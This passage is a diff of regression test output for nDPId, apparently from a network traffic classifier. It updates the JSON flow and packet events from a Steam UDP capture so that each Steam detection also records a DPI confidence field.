 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1357332165238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165238,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxvAqLyVSKU9r7JhaYoALFeNVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165238,"flow_last_seen":1357332165238,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165238,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1357332165243,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165243,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWT8AAIARDmTQb4VUwKi8lWmJsmEANLI1VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAPGE+dlEBAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1357332165266,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165266,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUAAAIARjWBFHJGqwKi8lWmKsmEANA+cVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA1CBaTb8AAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1357332165270,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165270,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUEAAIAROdSSQpgPwKi8lWmLsmEANCWgVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAfF+2fVEBAAA="}
@@ -176,28 +176,28 @@
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1357332165285,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165285,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUQAAIARxHFEjlsjwKi8lWmJsmEANM4fVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAQP0jAwIBAAA="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165287,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1357332165287,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165287,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LzAqLyVUatzB7JhaYsALBkuVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165287,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"steam.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165287,"flow_last_seen":1357332165287,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165287,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1357332165288,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165288,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw7AqLyVSKU9vLJhaYoALFeAVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1357332165288,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165288,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARBC\/AqLyVRI50srJhaYkALCSiVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165288,"flow_last_seen":1357332165288,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165288,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165289,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1357332165289,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165289,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L3AqLyVUatzBrJhaYoALBkwVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165289,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"steam.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165289,"flow_last_seen":1357332165289,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165289,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1357332165291,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165291,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUUAAIARDl7Qb4VUwKi8lWmKsmEANGnGVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAD\/WHUH0BAAA="}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1357332165310,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165310,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUYAAIARquBEjnSywKi8lWmJsmEANI39VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA\/x7bdLIAAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1357332165330,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165330,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUcAAIAR3b5IpT28wKi8lWmKsmEANK1cVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAARbG1YaUAAAA="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1357332165337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165337,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx7AqLyVkkKYDrJhaYoALLOQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1357332165337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165337,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qfAqLyVRRyRq7JhaYoALAcaVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1357332165337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332165337,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxrAqLyVSKU9sLJhaYkALFeNVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332165337,"flow_last_seen":1357332165337,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165337,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1357332165344,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165344,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUgAAIARDlrQb4VVwKi8lWmJsmEANOC5VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAApkPUDiMBAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1357332165370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165370,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUkAAIARjVZFHJGrwKi8lWmKsmEANABlVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAZ1y1R+AAAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1357332165375,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165375,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUoAAIAR3cdIpT2wwKi8lWmJsmEANEZJVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAApDC7AqgAAAA="}
@@ -205,61 +205,61 @@
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1357332165425,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165425,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWUwAAIAROcmSQpgPwKi8lWmJsmEANKyjVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAEZL3SfQAAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1357332165520,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332165520,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWU0AAIAROcmSQpgOwKi8lWmKsmEANHO2VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAoWZRYkMBAAA="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1357332165586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1357332165586,"pkt":"AFBW4RiuAAwp3FvtCABFAABEAABAAEARNwrAqLyVSKU9vLJhaYoAMEhAVlMwMQQAAwQABgAAAAAAAAEAAAABAAAAAQAAAAEAAAAEAAAAbm6TxQ=="}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
